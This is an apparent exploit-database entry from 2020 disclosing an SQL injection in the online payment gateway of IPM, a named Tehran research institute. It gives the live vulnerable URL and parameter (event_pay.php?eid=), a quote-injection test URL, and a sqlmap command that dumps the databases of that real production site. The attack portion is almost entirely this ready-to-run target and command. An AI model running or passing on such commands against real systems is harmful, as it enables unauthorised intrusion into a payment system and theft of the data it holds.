IPM Iran - Institute for Research in Fundamental Sciences SQLi(Online Payment gateway)

2020.04.26

H.BBF3.4 (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title:IPM Iran - Institute for Research in Fundamental Sciences SQLi
# Date: 25 Apr 2020
# Author: H.BBF3.4 & A.BBF3.4
+++++++++++++++++++++++++
ABOUT IPM Iran - Institute for Research in Fundamental Sciences :
The Institute for Research in Fundamental Sciences, previously Institute for Studies in Theoretical Physics and Mathematics, is an advanced public research institute in Tehran, Iran. IPM is directed by Mohammad Javad Larijani, its original founder. Wikipedia(https://en.wikipedia.org/wiki/Institute_for_Research_in_Fundamental_Sciences)
# SQL Injection Exploit :
**********************
event_pay.php?eid=
# Example Vulnerable Sites :
*************************
Online Payment gateway:
[+] https://payment.ipm.ir/portal/event_pay.php?eid=44
=> https://payment.ipm.ir/portal/event_pay.php?eid=44%27
SQLMAP:
sqlmap.py -u https://payment.ipm.ir/portal/event_pay.php?eid=44 --dbs
t.me/thebughunter

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

IPM Iran - Institute for Research in Fundamental Sciences SQLi(Online Payment gateway)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.